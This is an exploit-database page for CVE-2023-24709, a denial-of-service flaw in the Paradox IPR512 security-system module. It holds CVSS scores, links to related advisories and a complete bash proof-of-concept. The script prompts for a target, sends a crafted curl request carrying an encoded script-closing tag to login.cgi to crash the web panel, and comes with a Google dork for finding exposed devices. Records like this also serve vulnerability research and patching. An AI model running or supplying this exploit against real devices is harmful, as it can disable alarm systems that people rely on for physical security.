Lucene search
Giorgi Dograshvili1337DAY-ID-38575HistoryApr 10, 2023 - 12:00 a.m.
Paradox Security Systems IPR512 - Denial Of Service Exploit
2023-04-1000:00:00
Giorgi Dograshvili
0day.today
140
paradox security systems
ipr512
denial of service
exploit
cve-2023-24709
http
vulnerable
webpanel
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
0.002 Low
EPSS
Percentile
52.9%
#!/bin/bash
# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service
# Google Dork: intitle:"ipr512 * - login screen"
# Date: 09-APR-2023
# Exploit Author: Giorgi Dograshvili
# Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423)
# Version: IPR512
# CVE : CVE-2023-24709
# Function to display banner message
display_banner() {
echo "******************************************************"
echo "* *"
echo "* PoC CVE-2023-24709 *"
echo "* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *"
echo "* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *"
echo "* by SlashXzerozero *"
echo "* *"
echo "******************************************************"
}
# Call the function to display the banner
display_banner
echo ""
echo ""
echo "Please enter a domain name or IP address with or without port"
read -p "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain
# Step 2: Ask for user confirmation
read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm
if [[ $confirm == "Y" || $confirm == "y" ]]; then
# Display loading animation
animation=("|" "/" "-" "\\")
index=0
while [[ $index -lt 10 ]]; do
echo -ne "Loading ${animation[index]} \r"
sleep 1
index=$((index + 1))
done
# Use curl to send HTTP GET request with custom headers and timeout
response=$(curl -i -s -k -X GET \
-H "Host: $domain" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \
-H "Accept: */" \
-H "Referer: http://$domain/login.html" \
-H "Accept-Encoding: gzip, deflate" \
-H "Accept-Language: en-US,en;q=0.9" \
-H "Connection: close" \
--max-time 10 \
"http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")
# Check response for HTTP status code 200 and print result
if [[ $response == *"HTTP/1.1 200 OK"* ]]; then
echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"
else
echo -e "\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html"
fi
else
echo "The script is stopped!."
fi
Related
githubexploit
githubexploit
Exploit for Code Injection in Paradox Ipr512 Firmware
2023-01-26 12:13:51
Exploit for Code Injection in Paradox Ipr512 Firmware
2023-01-26 12:13:51
cve
cve
CVE-2023-24709
2023-03-21 23:15:12
prion
prion
Design/Logic Flaw
2023-03-21 23:15:00
packetstorm
packetstorm
Paradox Security Systems IPR512 Denial Of Service
2023-04-10 00:00:00
cvelist
cvelist
CVE-2023-24709
2023-03-21 00:00:00
nvd
nvd
CVE-2023-24709
2023-03-21 23:15:12
exploitdb
exploitdb
Paradox Security Systems IPR512 - Denial Of Service
2023-04-10 00:00:00
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
0.002 Low
EPSS
Percentile
52.9%
Related for 1337DAY-ID-38575